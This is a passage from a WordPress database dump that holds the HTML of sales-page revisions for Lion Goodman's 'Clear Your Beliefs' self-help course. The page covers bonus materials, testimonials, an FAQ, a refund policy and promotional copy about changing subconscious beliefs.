delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 16:06:04', '2014-06-17 21:06:04', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(929, 4194, '2014-06-17 15:59:17', '2014-06-17 20:59:17', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, 